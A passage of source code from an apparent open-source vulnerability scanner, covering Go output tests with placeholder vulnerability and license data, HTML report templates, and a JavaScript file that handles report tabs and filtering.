"mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() run(t, tt.args) }) } } func 
testOutputWithMixedIssues(t *testing.T, run outputTestRunner) { t.Helper() cwd := filepath.ToSlash(testutility.GetCurrentWorkingDirectory(t)) experimentalAnalysisConfig := models.ExperimentalAnalysisConfig{ Licenses: models.ExperimentalLicenseConfig{Summary: false, Allowlist: []models.License{"ISC"}}, } tests := []outputTestCase{ { name: "one_source_with_one_package,_one_vulnerability,_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: 
[]models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: true}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: 
"two_sources_with_packages,_one_vulnerability,_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "5.9.0", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{}, Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something 
scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, }, }, }, }, }, }, { name: 
"multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Commit: "abcxzy", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Ecosystem: "npm", Commit: "abc123", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", 
Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, MaxSeverity: "7.8", ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-2"}, 
ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-2": {Called: true}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, }, }, }, }, }, }, { name: "one_source_with_one_deprecated_package", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/lockfile", pkginfo{ Name: "deprecated-pkg", Version: "1.0.0", Ecosystem: "npm", 
Deprecated: true, Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, }, }, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() run(t, tt.args) }) } } ================================================ FILE: internal/output/html/base_image_template.gohtml ================================================
{{ $totalVuln := .VulnTypeSummary.All }} {{ range .ImageInfo.AllBaseImages}} {{ end }}
OS version: {{ .ImageInfo.OS }}
{{ if gt (len .AllLayers) 0}}
play_arrow
{{ end }}
{{ if eq .Index 0}} Your image: {{ else }} Base image {{ .Index }}: {{ end }} {{ getBaseImageName . }} ({{ .Count.AnalysisCount.Regular }}/{{ $totalVuln }} vulnerabilities)
{{ range .AllLayers }} {{ $index := .Index }} {{ $originalCommand := .LayerMetadata.Command }} {{ $commandSet := formatLayerCommand $originalCommand }} {{ $command := index $commandSet 0 }} {{ $commandDetail := index $commandSet 1 }} {{ $diffID := .LayerMetadata.DiffID }} {{ $longCommand := false }} {{ if gt (len $command) 109 }} {{ $longCommand = true }} {{ end }} {{ $hasVuln := false }} {{ if gt .Count.AnalysisCount.Regular 0 }} {{ $hasVuln = true }} {{ end }}

{{ .Index }} {{ $command }}

{{ if $longCommand }} {{ $originalCommand }} {{ end }}
{{ if $hasVuln }} {{ template "severity_summary_template.gohtml".Count.SeverityCount }} {{ end }}
{{ end }}
================================================ FILE: internal/output/html/deprecated_package_template.gohtml ================================================
play_arrow View deprecated packages
{{ range $ecosystem := .Ecosystems }} {{ range $source := $ecosystem.Sources }} {{ range $package := $source.Packages }} {{ if $package.Deprecated }} {{ end }} {{ end }} {{ end }} {{ end }}
Ecosystem Package Name Version
{{ $ecosystem.Name }} {{ $package.Name }} {{ $package.InstalledVersion }}
================================================ FILE: internal/output/html/filter_template.gohtml ================================================
{{ if .IsContainerScanning }}
Layer

keyboard_arrow_down

All layers ({{ .VulnCount.AnalysisCount.Regular }})

{{ template "severity_summary_template.gohtml" .VulnCount.SeverityCount }}
{{ range .ImageInfo.AllLayers }} {{ $index := .Index }} {{ $originalCommand := .LayerMetadata.Command }} {{ $commandSet := formatLayerCommand $originalCommand }} {{ $command := index $commandSet 0 }} {{ $commandDetail := index $commandSet 1 }} {{ $diffID := .LayerMetadata.DiffID }} {{ $longCommand := false }} {{ if gt (len $command) 109 }} {{ $longCommand = true }} {{ end }} {{ if gt .Count.AnalysisCount.Regular 0 }}

{{ $index }} {{ $command }}

{{ if $longCommand }} {{ $originalCommand }} {{ end }}
{{ template "severity_summary_template.gohtml".Count.SeverityCount }}
{{ end }} {{ end }}
{{ end }}
Filters

(/{{ add .VulnTypeSummary.All .VulnTypeSummary.Hidden }})

keyboard_arrow_down
{{ if hasOSResult .Ecosystems }} {{ end }} {{ if hasOSResult .Ecosystems }} {{ end }}
Overall Severity

{{ .VulnCount.SeverityCount.Critical }} Critical

{{ .VulnCount.SeverityCount.High }} High

{{ .VulnCount.SeverityCount.Medium }} Medium

{{ .VulnCount.SeverityCount.Low }} Low

{{ .VulnCount.SeverityCount.Unknown }} Unknown

================================================ FILE: internal/output/html/license_summary_template.gohtml ================================================
play_arrow View license summary
{{ range . }} {{ end }}
{{ .Name }}:{{ .Count }}
================================================ FILE: internal/output/html/package_table_template.gohtml ================================================ {{ if isOSResult .Type }} {{ else }} {{ end }} {{ $showLicense := false }} {{ if gt .LicenseViolationsCount 0 }} {{ $showLicense = true }} {{ end }} {{ range $rowIndex, $element := .Packages }} {{ $index := uniqueID }} {{ $isUncalled := false }} {{ if eq $element.VulnCount.AnalysisCount.Regular 0 }} {{ $isUncalled = true }} {{ end }} {{ $hasLicenseViolations := false }} {{ if gt (len .LicenseViolations) 0 }} {{ $hasLicenseViolations = true }} {{ end }} {{ if not $isUncalled }} {{ else }} {{ end }} {{ if $showLicense }} {{ if $hasLicenseViolations}} {{ else }} {{ end }} {{ end }} {{ end }}
Source PackagePackageInstalled version

Fix available

Fix available indicates whether a patch or update exists to address the vulnerabilities found in the corresponding package.

Vulnerability count

Vulnerability count shows the number of vulnerabilities found in the package, counted by each severity level.
License violations
play_arrow
{{ $element.Name }} {{ if ne $element.InstalledVersion "" }} {{ $element.InstalledVersion }} {{ else if ne $element.Commit "" }}
@{{ GetShortCommit $element.Commit }}
Commit: {{ $element.Commit }}
{{ end }}
{{ if ne $element.VulnCount.FixableCount.UnFixed 0 }} {{ if eq $element.VulnCount.FixableCount.Fixed 0}}

No fix available

All {{ $element.VulnCount.AnalysisCount.Regular }} vulnerabilities have no fixed version available. {{ else }}

Partial fixes available

Upgrading the package can fix {{ $element.VulnCount.FixableCount.Fixed }} out of {{ $element.VulnCount.AnalysisCount.Regular }} vulnerabilities. {{ end }} {{ else }}

Fix available

Upgrading the package can fix all {{ $element.VulnCount.FixableCount.Fixed }} vulnerabilities. {{ end }}
{{ template "severity_summary_template.gohtml" $element.VulnCount.SeverityCount }}

Filtered out

{{ getFilteredVulnReasons $element.HiddenVulns }}

{{ formatLicense .LicenseViolations }} --
{{ $binaries := formatSlice $element.OSPackageNames }} {{ if not (eq $binaries "") }}

Installed binaries: {{ $binaries }}

{{ end }} {{ if and $element.LayerDetail.LayerInfo.LayerMetadata (not (eq $element.LayerDetail.LayerInfo.LayerMetadata.Command "")) }} {{ $index := $element.LayerDetail.LayerIndex }} {{ $diffID := $element.LayerDetail.LayerInfo.LayerMetadata.DiffID }} {{ $baseImageIndex := $element.LayerDetail.LayerInfo.LayerMetadata.BaseImageIndex }} {{ $originalCommand := $element.LayerDetail.LayerInfo.LayerMetadata.Command }} {{ $commandSet := formatLayerCommand $originalCommand }} {{ $command := index $commandSet 0 }} {{ $commandDetail := index $commandSet 1 }} {{ $longCommand := false }} {{ if gt (len $command) 109 }} {{ $longCommand = true }} {{ end }}
{{ if $longCommand }}

Introduced in layer # {{ $index }}: 

{{ $command }}

{{ $originalCommand }}
{{ else if ne $commandDetail "" }}

Introduced in layer # {{ $index }}: 

{{ $command }}

{{ $commandDetail }}
{{ else }}

Introduced in layer # {{ $index }}: 

{{ $command }}

{{ end }}

In base image: {{ if eq $baseImageIndex 0 }} False {{ else }} {{ getBaseImageName $element.LayerDetail.BaseImageInfo }}{{ end }}

{{ end }} {{ template "vuln_table_template.gohtml" $element }}
================================================ FILE: internal/output/html/package_view_template.gohtml ================================================ {{ range . }}

{{ .Name }}

{{ range .Sources }}

Source: {{ .Name }}

{{ template "package_table_template.gohtml" . }}
{{ end }}
{{ end }} ================================================ FILE: internal/output/html/report_template.gohtml ================================================ Vulnerability Scan Report

Open Source Vulnerabilities

Scanning summary

{{ template "filter_template.gohtml" .}} {{ if .IsContainerScanning }} {{ template "base_image_template.gohtml" .}} {{ end }} {{ if .LicenseSummary.Summary }} {{ template "license_summary_template.gohtml" .LicenseSummary.LicenseCount }} {{ end }} {{ if gt .PkgDeprecatedCount 0 }} {{ template "deprecated_package_template.gohtml" . }} {{ end }}
{{template "package_view_template.gohtml" .Ecosystems}}
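================================================ FILE: internal/output/html/script.js ================================================
// Client-side behaviour for the generated HTML report: expanding rows, opening
// osv.dev pages in tabs, and filtering vulnerabilities by type, layer and ID.
//
// Every value written into the page goes through textContent, className, id or
// createElement; nothing here assigns markup strings, so report data is never
// parsed as HTML by this script.

// Currently selected vulnerability types ("all", "project", "os", "uncalled").
const selectedTypeFilterValue = new Set(["all"]);
// Currently selected container layer, or "all".
let selectedLayer = "all";

// Returns the first .material-icons element inside the element with the given
// ID. Looking the parent up by ID and then searching inside it avoids
// interpolating an ID into a CSS selector string, which would be a syntax
// error (or match something else) for IDs containing selector metacharacters.
function findIconIn(elementID) {
  return document.getElementById(elementID).querySelector(".material-icons");
}

// Reads an integer count from a data-* attribute, treating a missing or
// non-numeric attribute as 0 so the summed total never becomes NaN.
function readCount(element, attributeName) {
  const parsed = parseInt(element.getAttribute(attributeName), 10);
  return Number.isNaN(parsed) ? 0 : parsed;
}

// Toggles the "<summaryID>-details" block and its "<summaryID>-icon" arrow.
function toggleDetails(summaryID) {
  const detailsElement = document.getElementById(`${summaryID}-details`);
  const iconElement = document.getElementById(`${summaryID}-icon`);
  detailsElement.classList.toggle("hide-block");
  iconElement.classList.toggle("expanded");
}

// Selects a layer directly (outside the dropdown) and re-applies the filters.
function quickFilterByLayer(DiffID, layerCommand) {
  selectedLayer = DiffID;
  applyFilters(selectedTypeFilterValue, selectedLayer);
  const selectedDisplay = document.getElementById("layer-filter-selected");
  selectedDisplay.textContent = layerCommand;
}

// Expands or collapses the layer list of one base image.
function showBaseImageLayer(imageID) {
  const detailsElement = document.getElementById(
    `base-image-details-${imageID}`
  );
  const icon = findIconIn(`base-image-summary-${imageID}`);
  // classList.toggle returns true when the class is now present (block hidden).
  const hidBlock = detailsElement.classList.toggle("hide-block");
  icon.classList.toggle("expanded", !hidBlock);
}

// Expands or collapses the details row of one package.
function showPackageDetails(detailsId) {
  const detailsElement = document.getElementById(
    `table-tr-${detailsId}-details`
  );
  const icon = findIconIn(`table-tr-${detailsId}`);
  const hidBlock = detailsElement.classList.toggle("hide-block");
  icon.classList.toggle("expanded", !hidBlock);
}

// Opens the osv.dev page for a vulnerability in a new in-report tab, or
// switches to the tab if it is already open.
function openVulnInNewTab(inputString) {
  // inputString comes from the report template (not visible in this file) and
  // ultimately from scan data. Encoding it keeps the value inside a single path
  // segment of the fixed osv.dev origin instead of letting "/", "?" or "#"
  // reshape the URL that the iframe loads.
  const osvURL = `https://osv.dev/${encodeURIComponent(inputString)}`;
  const tabs = document.getElementById("tabs");
  const tabSwitches = document.getElementById("tab-switch");

  const existingTab = document.getElementById(inputString);
  if (existingTab) {
    openTab(inputString);
    return;
  }

  // Create the new tab div.
  const newTab = document.createElement("div");
  newTab.id = inputString;
  newTab.className = "tab osv-tab";

  // Create a spinner indicating loading status
  const spinner = document.createElement("div");
  spinner.className = "iframe-spinner";

  // Create the iframe element.
  const iframe = document.createElement("iframe");
  // Do not send the report's own URL to the remote site: a report served from
  // an internal host would otherwise disclose its location in the Referer.
  iframe.referrerPolicy = "no-referrer";
  // NOTE(review): the frame is not sandboxed; whether a sandbox attribute is
  // compatible with the embedded site has not been checked here.
  iframe.src = osvURL;
  iframe.onload = () => {
    // load can fire again if the framed page navigates; remove() is a no-op
    // once the spinner is detached, whereas removeChild would throw.
    spinner.remove();
  };

  // Create a new tab button
  const newTabButton = document.createElement("div");
  newTabButton.id = `${inputString}-button`;
  newTabButton.className = "tab-switch-button";
  newTabButton.onclick = () => {
    openTab(inputString);
  };

  // Build the button's label and its underline marker.
  const newTabTextContainer = document.createElement("div");
  newTabTextContainer.className = "tab-button-text-container";
  const newTabText = document.createElement("p");
  newTabText.textContent = inputString;
  newTabTextContainer.appendChild(newTabText);
  const newTabButtonBorder = document.createElement("div");
  newTabButtonBorder.className = "tab-switch-button-border";
  newTabTextContainer.appendChild(newTabButtonBorder);
  newTabButton.appendChild(newTabTextContainer);

  const closeIcon = document.createElement("span");
  closeIcon.className = "material-icons";
  closeIcon.textContent = "close";
  // Add the onclick function to the close icon
  closeIcon.onclick = event => {
    event.stopPropagation(); // Prevent the click from opening the tab
    closeVulnTab(inputString);
  };
  newTabButton.appendChild(closeIcon);

  // Add the spinner and iframe to the new tab div.
  newTab.appendChild(spinner);
  newTab.appendChild(iframe);

  // Add the tab and its button to their containers.
  tabs.appendChild(newTab);
  tabSwitches.appendChild(newTabButton);
  openTab(newTab.id);
}

// Removes a vulnerability tab and activates a neighbouring tab if one exists.
function closeVulnTab(inputString) {
  const tabToRemove = document.getElementById(inputString);
  const buttonToRemove = document.getElementById(`${inputString}-button`);
  const tabs = document.getElementById("tabs");
  const tabSwitches = document.getElementById("tab-switch");

  if (tabToRemove && buttonToRemove) {
    const nextTabButton =
      buttonToRemove.nextElementSibling ||
      buttonToRemove.previousElementSibling;
    tabs.removeChild(tabToRemove);
    tabSwitches.removeChild(buttonToRemove);
    if (nextTabButton) {
      const nextTabId = nextTabButton.id.replace("-button", "");
      openTab(nextTabId);
    }
  }
}

// Shows the tab with the given ID and hides the others. Tabs and tab buttons
// are paired by index, so both collections must be in the same order.
function openTab(activeTabId) {
  const tabs = document.getElementsByClassName("tab");
  const tabButtons = document.getElementsByClassName("tab-switch-button");
  for (let i = 0; i < tabs.length; i += 1) {
    tabs[i].classList.toggle("hide-block", tabs[i].id !== activeTabId);
    tabButtons[i].classList.toggle(
      "tab-switch-button-selected",
      tabs[i].id === activeTabId
    );
  }
}

// Closes every filter dropdown.
function hideAllFilterOptions() {
  const containers = document.getElementsByClassName("filter-option-container");
  for (const container of containers) {
    container.classList.add("hide-block");
  }
}

// Toggles the dropdown "<input>-filter-option-container" and closes the rest.
function toggleFilter(input) {
  const targetID = `${input}-filter-option-container`;
  const optionContainer = document.getElementById(targetID);
  const containers = document.getElementsByClassName("filter-option-container");
  for (const loopContainer of containers) {
    if (loopContainer.id === targetID) {
      optionContainer.classList.toggle("hide-block");
    } else {
      loopContainer.classList.add("hide-block");
    }
  }
}

// Hides package rows, source sections and ecosystem sections that have no
// visible vulnerability row left, and shows those that still have one.
function showAndHideParentSections() {
  const ecosystemContainers = document.querySelectorAll(".ecosystem-container");
  ecosystemContainers.forEach(ecosystemContainer => {
    const sourceContainers =
      ecosystemContainer.querySelectorAll(".source-container");
    let ecosystemHasVisibleSources = false;

    sourceContainers.forEach(sourceContainer => {
      const packageRows = sourceContainer.querySelectorAll(".package-tr");
      let sourceHasVisibleRows = false;

      packageRows.forEach(packageRow => {
        const packageDetails = document.getElementById(
          `${packageRow.id}-details`
        );
        const vulnRows = packageDetails.querySelectorAll(".vuln-tr");
        if (
          Array.from(vulnRows).some(
            row => !row.classList.contains("hide-block")
          )
        ) {
          sourceHasVisibleRows = true;
          packageRow.classList.remove("hide-block");
          return;
        }

        packageRow.classList.add("hide-block");
        packageDetails.classList.add("hide-block");
        // Search inside the row itself rather than building a selector from
        // its ID.
        const icon = packageRow.querySelector(".material-icons");
        icon.classList.remove("expanded"); // Rotate back to 0 degrees
      });

      sourceContainer.classList.toggle("hide-block", !sourceHasVisibleRows);
      if (sourceHasVisibleRows) {
        ecosystemHasVisibleSources = true;
      }
    });

    ecosystemContainer.classList.toggle(
      "hide-block",
      !ecosystemHasVisibleSources
    );
  });
}

// Shows every vulnerability row except the uncalled ones, which stay hidden.
function showAllVulns() {
  const vulnRows = document.getElementsByClassName("vuln-tr");
  for (const row of vulnRows) {
    const isUncalled = row.classList.contains("uncalled-tr");
    row.classList.toggle("hide-block", isUncalled);
  }
  showAndHideParentSections();
}

function applyFilters(selectedTypeFilterValue, selectedLayerFilterValue) {
  // Show all vulnerabilities and then hide those that do not match the filter requirements.
  showAllVulns();
  applyTypeFilter(selectedTypeFilterValue);
  applyLayerFilter(selectedLayerFilterValue);
  showAndHideParentSections();
}

// Hides vulnerability rows whose ecosystem type is not selected, and shows or
// hides uncalled rows according to the "uncalled" selection.
function applyTypeFilter(selectedValue) {
  updateTypeFilterText();
  const selectedAll = selectedValue.has("all");
  const selectedProject = selectedAll || selectedValue.has("project");
  const selectedOS = selectedAll || selectedValue.has("os");
  const selectedUncalled = selectedValue.has("uncalled");

  const ecosystemElements = document.querySelectorAll(".ecosystem-container");
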